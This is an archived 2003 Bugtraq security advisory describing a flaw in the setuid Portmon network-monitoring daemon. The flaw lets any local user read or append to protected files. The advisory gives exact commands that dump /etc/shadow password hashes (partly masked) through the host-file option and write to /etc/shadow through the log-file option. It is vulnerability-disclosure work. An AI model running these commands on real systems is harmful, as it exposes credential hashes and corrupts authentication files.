Portmon file arbitrary read/write access vulnerability

From: David Han*** (dmhancoc_at_us.ibm.com)
Date: 06/17/03

  • Next message: jelmer: "Re: [Full-Disclosure] Cross-Site Scripting in Unparsable XML Files (GM#013-IE)" 
    To: bugtraq@securityfocus.com
Date: Tue, 17 Jun 2003 14:47:40 -0700

    Package: Portmon
    Auth: http://www.aboleo.net/
    Version(s): 1.7 (prior ?)
    Vulnerability: File arbitrary read/write access
    vulnerability

    Portmon is a network service monitoring daemon
    (http://www.aboleo.net/software/portmon/).
    "In order to use ping support, Portmon must run as root
    or be installed setuid with root permissions
    due to the fact that it must open up a raw socket."
    The product suffer from a security problem that allows
    any local user to read/write protected files on the system.
    This is dude to a hole in the way the program handles
    loading of two configuration files: host file/log file.

    Example (read):

    [lucae@linux lucae]$portmon -c /etc/shadow

    Unable to resolve hostname
    root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::
    Unable to resolve hostname bin:*:12172:0:99999:7:::
    Unable to resolve hostname daemon:*:12172:0:99999:7:::
    Unable to resolve hostname adm:*:12172:0:99999:7:::
    Unable to resolve hostname lp:*:12172:0:99999:7:::
    Unable to resolve hostname sync:*:12172:0:99999:7:::
    Unable to resolve hostname shutdown:*:12172:0:99999:7:::
    Unable to resolve hostname halt:*:12172:0:99999:7:::
    Unable to resolve hostname mail:*:12172:0:99999:7:::
    Unable to resolve hostname news:*:12172:0:99999:7:::

    <snip>

    Example (write):

    [lucae@linux lucae]$portmon -l /etc/shadow
    fopen: No such file or directory
    Failed reading config file hosts

    [root@linux root]#cat /etc/shadow
    <snip>

    lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::
    nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::
    test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::
    (Mon Jun 16 01:40:17 2003) - Portmon started by user
    lucae //line added

    [root@linux root]#

    Luca Ercoli luca.ercoli[at]inwind.it

  • Next message: jelmer: "Re: [Full-Disclosure] Cross-Site Scripting in Unparsable XML Files (GM#013-IE)"
    • Quantcast